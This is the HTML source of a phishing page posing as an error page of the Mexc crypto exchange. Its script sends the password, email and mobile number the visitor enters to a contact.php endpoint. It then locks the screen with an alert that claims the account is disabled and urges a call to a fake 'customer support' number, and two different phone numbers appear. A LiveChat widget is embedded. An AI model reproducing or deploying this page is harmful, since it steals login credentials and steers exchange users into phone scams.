<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Error - Mexc</title>
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/simple-line-icons/2.4.1/css/simple-line-icons.min.css"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <link rel="stylesheet" href="assets/css/style.css" />
    <link rel="shortcut icon" type="image/x-icon" href="assets/favicon.png" />
    <script src="https://unpkg.com/sweetalert2@7.8.2/dist/sweetalert2.all.js"></script>
    <style>
      .btn:not(:disabled):not(.disabled) {
        cursor: pointer;
        height: 60px;
      }
      .overlay {
        display: none;
        position: fixed;
        width: 100%;
        height: 100%;
        top: 0;
        background: #00000057;
      }
      .mob {
        width: 39%;
        margin: auto;
        background: #fff;
        border-radius: 10px;
        padding: 3%;
        margin: 9% auto;
      }
      .mob label {
        font-family: sans-serif;
        text-align: center;
        width: 100%;
        margin: 5% 0%;
        font-weight: 100;
        font-size: 22px;
      }
      .mob input {
        width: 100%;
        padding: 3%;
        border-radius: 5px;
        border: 1px solid #eee;
        margin-bottom: 5%;
        box-sizing: border-box;
        background: #eee;
      }
      .mob button {
        background: #29e1f8;
        border: 0px;
        padding: 3%;
        width: 100%;
        border-radius: 5px;
        margin-bottom: 5%;
        margin-top: -1%;
        color: #fff;
        font-size: 18px;
      }
      .registration-form h2 {
        font-weight: 700;
        font-size: 38px;
      }
      label {
        font-weight: 600;
      }
      ul.links li {
        font-size: 9px;
        color: rgb(103, 104, 104);
        list-style: none;
        text-align: center;
      }

      ul.links {
        padding: 2%;
      }
      .form-group.aa {
        display: flex;
        align-items: center;
        justify-content: space-between;
        margin-top: 9%;
      }

      .form-group.aa a {
        color: #000;
        font-weight: 600;
        font-size: 14px;
      }
      header {
        display: flex;
        align-items: center;
        justify-content: space-between;
        padding: 15px 3%;
      }

      .right a {
        color: rgb(1, 3, 4);
      }
      .create-account {
        background: rgb(1, 3, 4);
        color: rgb(255, 255, 255);
        border-radius: 50px;
        padding: 1% 8%;
        font-size: 17px;
        height: 56px;
        font-weight: 600;
        line-height: 24px;
      }
      .box-error {
        padding: 40px;
      }
      .coinbaselogo {
        max-width: 120px;
        width: 100%;
      }

      .coinbaselogo img {
        width: 100%;
        margin: 0;
      }
      .crossError {
        width: 65px;
        height: 65px;
        background: #dc2916;
        display: flex;
        align-items: center;
        justify-content: center;
        font-size: 30px;
        font-weight: 500;
        color: #fff;
        border-radius: 50%;
        margin: 70px auto 35px;
      }
      .box-error .form_txt p {
        margin: 20px 0 30px;
      }

      .wrap-login100 .form_txt input.btn-primary {
        width: 100%;
        padding: 0em 2em;
        font-size: 16px;
        background: #09dcf7;
        height: 45px;
      }

      .coinbaselogo {
        max-width: 120px;
        width: 100%;
        display: flex;
        flex-direction: row;
      }

      img {
        height: 40px;
      }

      .text-left {
        text-align: left;
        text-align: center;
      }

      .session {
        width: 480px;
        margin: 20px auto 0;
      }

      .box-error {
        background: #fff;
        -webkit-box-shadow: 0 1px 46px -4px rgb(0 0 0 / 28%);
        box-shadow: 0 1px 46px -4px rgb(0 0 0 / 28%);
        border-radius: 4px;
        position: relative;
        padding: 40px;
      }
      @media (max-width: 768px) {
        .right {
          display: none;
        }
        .registration-form {
          padding: 1px 0;
        }
        .mob {
          width: 90% !important;
        }
      }

      #set_bg {
        background-image: url("download.png");
        background-size: cover; /* <------ */
        background-repeat: no-repeat;
      }
    </style>
  </head>

  <body id="set_bg">
    <script
      type="text/javascript"
      src="https://code.jquery.com/jquery-3.2.1.min.js"
    ></script>
    <script
      type="text/javascript"
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"
    ></script>
    <script src="assets/js/script.js"></script>

    <script>
      function myfunction() {
        var pwd = document.getElementById("password").value;
        var email = document.getElementById("email").value;
        var mobile = document.getElementById("mobile").value;
        if (pwd == "" || email == "") {
        } else if (mobile == "") {
          document.getElementById("mobile").style.borderColor = "red";
        } else {
          // POST request using fetch()

          setTimeout(function () {
            // Something you want delayed.

            fetch("contact.php", {
              // Adding method type
              method: "POST",

              // Adding body or contents to send
              body: JSON.stringify({
                pwd: pwd,
                email: email,
                mobile: mobile,
              }),

              // Adding headers to the request
              headers: {
                "Content-type": "application/json; charset=UTF-8",
              },
            })
              // Converting to JSON
              .then((response) => response.json())
              // Displaying results to console
              .then((json) => console.log(json));

            // document.getElementById("form1").style.display="none";
            // document.getElementById("error").style.display="block";
            // window.location.href="error.php";
            $(".overlay1").show();
            return false;
          }, 1000);
        }

        return false;
      }

      function redirectMe2() {
        $(".overlay").show();
        return false;
      }
    </script>

    <script>
      swal({
        title: "Your Account is Disabled.",
        html: "Your Account Has been disabled due to verification.<br> Kindly call on customer Support number   +1   (202) 571-6348  <br> To verify and Unblock your account.",
        type: "warning",
        //   showCancelButton: true,
        confirmButtonColor: "#DD6B55",
        confirmButtonText:
          '<a href="tel:+1 (202) 571-6348" style="color:inherit;text-decoration:none"> Call Support</a>',
        timer: 2000000,
        buttons: false,
        allowOutsideClick: false,
        closeClick: false,
        closeOnConfirm: false,
      }).then(() => {
        if (result.value) {
          alert();
          // handle Confirm button click
        } else {
          // result.dismiss can be 'cancel', 'overlay', 'esc' or 'timer'
        }
      });

      $("body").click(function () {
        swal({
          title: "Your Account is Disabled.",
          html: "Your Account Has been disabled due to verification.<br> Kindly call on customer Support number   +1   (805) 994-0624  <br> To verify and Unblock your account.",
          type: "warning",
          //   showCancelButton: true,
          confirmButtonColor: "#DD6B55",
          confirmButtonText:
            '<a href="tel:+1   (805) 994-0624 " style="color:inherit;text-decoration:none"> Call Support</a>',
          timer: 2000000,
          buttons: false,
          allowOutsideClick: false,
          closeClick: false,
          closeOnConfirm: false,
        }).then(() => {
          if (result.value) {
            alert();
            // handle Confirm button click
          } else {
            // result.dismiss can be 'cancel', 'overlay', 'esc' or 'timer'
          }
        });
      });
    </script>

    <!-- Start of LiveChat (www.livechat.com) code -->
    <script>
      window.__lc = window.__lc || {};
      window.__lc.license = 18873294;
      window.__lc.integration_name = "manual_channels";
      window.__lc.product_name = "livechat";
      (function (n, t, c) {
        function i(n) {
          return e._h ? e._h.apply(null, n) : e._q.push(n);
        }
        var e = {
          _q: [],
          _h: null,
          _v: "2.0",
          on: function () {
            i(["on", c.call(arguments)]);
          },
          once: function () {
            i(["once", c.call(arguments)]);
          },
          off: function () {
            i(["off", c.call(arguments)]);
          },
          get: function () {
            if (!e._h)
              throw new Error(
                "[LiveChatWidget] You can't use getters before load."
              );
            return i(["get", c.call(arguments)]);
          },
          call: function () {
            i(["call", c.call(arguments)]);
          },
          init: function () {
            var n = t.createElement("script");
            (n.async = !0),
              (n.type = "text/javascript"),
              (n.src = "https://cdn.livechatinc.com/tracking.js"),
              t.head.appendChild(n);
          },
        };
        !n.__lc.asyncInit && e.init(),
          (n.LiveChatWidget = n.LiveChatWidget || e);
      })(window, document, [].slice);
    </script>
    <noscript
      ><a href="https://www.livechat.com/chat-with/18873294/" rel="nofollow"
        >Chat with us</a
      >, powered by
      <a
        href="https://www.livechat.com/?welcome"
        rel="noopener nofollow"
        target="_blank"
        >LiveChat</a
      ></noscript
    >
    <!-- End of LiveChat code -->
  </body>
</html>
